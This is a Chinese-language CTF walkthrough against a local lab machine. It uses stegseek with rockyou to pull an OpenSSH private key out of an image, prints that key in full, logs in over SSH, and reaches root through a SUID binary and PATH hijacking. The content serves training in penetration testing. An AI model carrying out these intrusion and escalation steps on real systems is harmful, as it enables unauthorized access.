搜索目标,使用:nmap -sn 192.168.111.0/24 扫描当前ip段的存货
-sn是忽略端口,只扫描存活,发现IP:192.168.111.133
先不要扫描,直接访问:192.168.111.133,打开是普通的网页
观察内容,这是一道CTF题目
打开源码,发现密文,base64解码多次,得到没啥用的东西
看似没啥用,但其实收尾呼应,这跟标题一样
思路就是当成目录来拼接
结果还真的是出现了隐藏目录,这个文件里有很多目录
全部都来访问一下吧,先保存下来,然后再用sed工具进行拼接可能性
sed 's|^|http://192.168.111.133|' secret.txt >> Secret.txt
sed 's|^|http://192.168.111.133/DRAGON%20BALL|' secret.txt >> Secret.txt
sed 's|^|http://192.168.111.133/DRAGON%20BALL/Vulhub|' secret.txt >> Secret.txt拼接完后,就是这样子的
但有一些空格,需要变成%20
sed 's/ /%20/g' Secret.txt SEcret.txt Python写个脚本跑一下,全是404,妈的兔子洞
import requests
f = open('www.txt','r',encoding='utf-8')
for i in f.readlines():
res = requests.get(i.strip())
print(res.text)检查图片,下载图片下来,使用几个工具来检查
┌──(root㉿ kali)-[~/桌 面 ]
└─# ls -liah aj.jpg
659682 -rw-r--r-- 1 root root 74K 3月 20日 04:45 aj.jpg
┌──(root㉿ kali)-[~/桌 面 ]
└─# file aj.jpg
aj.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 959x535, components 3
┌──(root㉿ kali)-[~/桌 面 ]
└─# exiftool aj.jpg
ExifTool Version Number : 12.76
File Name : aj.jpg
Directory : .
File Size : 75 kB
File Modification Date/Time : 2024:03:20 04:45:57-04:00
File Access Date/Time : 2024:03:20 04:45:58-04:00
File Inode Change Date/Time : 2024:03:20 04:45:57-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 959
Image Height : 535
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 959x535
Megapixels : 0.513 查看捆绑
┌──(root㉿ kali)-[~/桌 面 ]
└─# binwalk aj.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01 查看隐写,密码填了:xmen
因为是首页的提示,但要你输入密码,不一定是有隐写存在
┌──(root㉿ kali)-[~/桌 面 ]
└─# steghide info aj.jpg
"aj.jpg":
format: jpeg
capacity: 4.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase! 查看隐写,换一个工具
这个工具屌就屌在能使用字典爆破,字典是kali内置的,需要解压出来
而且字典很大,压缩前51M,解压后134M
┌──(root㉿ kali)-[~/桌 面 ]
└─# stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "love"B)
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".
┌──(root㉿ kali)-[~/桌 面 ]
└─# ls
aj.jpg aj.jpg.out secret.txt Secret.txt SEcret.txt
┌──(root㉿ kali)-[~/桌 面 ]
└─# cat aj.jpg.out
-----BEGIN OPENSSH PRIVATE KEY-----
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
Bd8180GtBAAaGtiwAAAAlrYWxpQGthbGk=
-----END OPENSSH PRIVATE KEY----- 发达,是一条 openssh 的私钥
思路:先不用nmap扫描有没有开放ssh端口,直接连接,避免被发现
┌──(root㉿ kali)-[~/桌 面 ]
└─# ssh root@192.168.111.133 -i aj.jpg.out
The authenticity of host '192.168.111.133 (192.168.111.133)' can't be established.
ED25519 key fingerprint is SHA256:P12mV1blKWnZALZhtS7i9dBWGPg2ruqeEEv4IduCaGU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.111.133' (ED25519) to the list of known hosts.
root@192.168.111.133's password: 尝试root没作用,但是发现root用户登录权限是开的
先尝试用其他用户名,毕竟现在密码有了,搞到用户名就行了
思路:去首页,或者登录页面看看哪些像是可以用来做用户名的
这里密钥说不能太开放,777权限太过开放了,只能600
┌──(root㉿ kali)-[~/桌 面 ]
└─# chmod 600 密 钥
┌──(root㉿ kali)-[~/桌 面 ]
└─# ssh xmen@192.168.111.133 -i 密 钥
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 07:09:06 2021 from 192.168.43.111
xmen@debian:~$ 然后就连接上了
最后,root提权,先来寻找一下有root权限的文件有哪些
find / -perm -4000 -type f 2>/dev/null
# 0是标准输入
# 1是标准输出
# 2>/dev/null 2是错误输出,扔去/dev/null文件夹里,自动清理掉
其中一个root文件在当前目录
看了一下这两个源代码和运行结果,应该要联想到是有关系的,毕竟是ctf,是简单一点的
然后采用环境变量提权的方法来耍,接下来我也只是一知半解
接下来先在我当前家目录下创建一个文件,用来运行提权的,最好在临时文件夹搞
我这次在临时文件夹搞吧
写入一个shell命令进去一个文件,等下用来执行
然后修改环境:export PATH=/tmp:$PATH 很明显是加了tmp在前面,优先级从/tmp开始找
这时候就劫持了ps命令,ps命令会转到 /tmp/ps 文件来运行,一运行就是shell命令
直接变成root权限,虽然不清楚为什么是root权限,但是知道/bin/bash能提权就行了
本文含有隐藏内容,请 开通VIP 后查看